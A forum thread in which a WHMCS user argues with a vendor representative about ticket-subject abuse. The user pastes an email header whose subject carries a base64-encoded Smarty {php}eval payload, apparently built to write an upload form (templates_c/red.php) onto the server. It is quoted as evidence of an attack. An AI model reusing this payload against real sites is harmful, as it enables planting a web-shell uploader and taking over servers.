The Security patch for WHMCS V5.03 was released on 12-01-11 and can be read
hereOriginally Posted by Matt
I have responded to your support ticket about this. Once again there is nothing malicious about Smarty code being included in support tickets. The whole point is the variables are being sanitized otherwise you would have been hacked already. The code you are receiving poses no risk to your system, and trying to report it to sites as a security vulnerability is a silly thing to do - it is not. The vulnerability that existed was fixed 2 months ago.
If you have any further concerns, reply to the ticket and ask for my attention.
Matt
I did not see that the subject line code has been converted to html entities and still reject that the event that occurred was in fact abuse of the subject line.X-MSK: FRNDReturn-path: <nobody@xxx.xxx.com> Envelope-to: xxx@xxxxxxx.com Delivery-date: Mon, 09 Jan 2012 15:49:18 -0600 Received: from nobody by xxxxx.xxxxxxx-xxxxxx.com with local (Exim 4.69) (envelope-from <xxxxx@xxxxx.xxxxxx-xxxxxxx.com>) id 1RkN5i-0006OT-0h; Mon, 09 Jan 2012 15:49:18 -0600 To: ss <ss@ss.ss> Subject: [Ticket ID: 222440] {php}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php} X-PHP-Script: xxxxx.xxxxxx.com/submitticket.php for 31.13.208.48 Date: Mon, 9 Jan 2012 16:49:18 -0500 From: "xxxxxxxxInc. xxxxxx Sales" <sales@xxxx.xxxxx.com> Message-ID: <9aa1b352deb371b08587738d92f18c7e@xxxxx.xxxxxx.com> X-Priority: 3 X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net) MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="b1_9aa1b352deb371b08587738d92f18c7e" Is the resulting email after the web form was used to submit a ticket in the queue that does not require a client registration. Does anyone else want their subject line to be abused like this? It totally blows away your admin view ticket template.
Home
Help
Search
Login
Register
Print